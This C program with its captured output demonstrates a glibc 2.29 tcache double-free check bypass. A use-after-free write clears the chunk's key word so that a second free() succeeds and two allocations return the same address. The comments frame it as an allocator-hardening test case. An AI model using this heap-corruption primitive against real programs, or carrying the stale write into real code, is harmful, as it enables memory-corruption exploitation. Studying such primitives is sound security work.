glibc 2.29 tcache double-free exploit (key-check bypass demonstration)
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
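/*
 * Demonstrates why glibc 2.29's tcache double-free check is not a security
 * boundary.  When a small chunk is freed into the tcache, the allocator
 * stores a per-thread marker in the chunk's second user word (e->key); a
 * later free() of the same chunk compares e->key against that marker and
 * aborts on a match ("__glibc_unlikely (e->key == tcache)").  The check only
 * sees whatever is currently in memory, so a use-after-free write that
 * clears that word (ptr1[1] = 0 below) lets the second free() pass and the
 * chunk is linked into the tcache bin twice.  The next two malloc() calls of
 * the same size then return the same address, as the "Result" section shows.
 *
 * Every access to ptr1 after the first free() is undefined behaviour; this
 * is a test-case for allocator hardening, not a pattern to copy.
 * AddressSanitizer (-fsanitize=address) reports both the stale write and the
 * second free().  Later glibc releases replace the fixed marker with a
 * random per-process value (tcache_key, from 2.34 as far as I know), so a
 * constant zero no longer passes; the root cause remains the stale write.
 */
int main(void) {
    /* 0x20-byte request: a small size that is served from the tcache. */
    uint64_t *ptr1 = malloc(0x20);
    if (ptr1 == NULL) {
        /* Without this guard a NULL return would be written to at ptr1[1]. */
        fprintf(stderr, "malloc failed\n");
        return EXIT_FAILURE;
    }
    /* %p expects void *; passing uint64_t * directly is not well-defined. */
    fprintf(stderr, "Tcache ptr1: %p\n", (void *)ptr1);

    free(ptr1);
    fprintf(stderr, "Free ptr1\n");

    /* Use-after-free: the second user word of a freed tcache chunk holds
     * the allocator's e->key marker; overwriting it defeats the check. */
    ptr1[1] = 0;
    fprintf(stderr, "Initialize ptr1[1]\n");
    fprintf(stderr, "Bypass (__glibc_unlikely (e->key == tcache))\n");

    /* Double free: the key comparison no longer matches, so no abort. */
    free(ptr1);
    fprintf(stderr, "Double Free Finish\n");

    /* Call malloc() in separate statements: the evaluation order of
     * function arguments is unspecified in C, so the original one-line
     * form did not fix which allocation happened first. */
    void *first = malloc(0x20);
    void *second = malloc(0x20);
    fprintf(stderr, "Allocate %p, %p\n", first, second);
    return 0;
}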
Result (stderr output)
Tcache ptr1: 0x5610c215f260
Free ptr1
Initialize ptr1[1]
Bypass (__glibc_unlikely (e->key == tcache))
Double Free Finish
Allocate 0x5610c215f260, 0x5610c215f260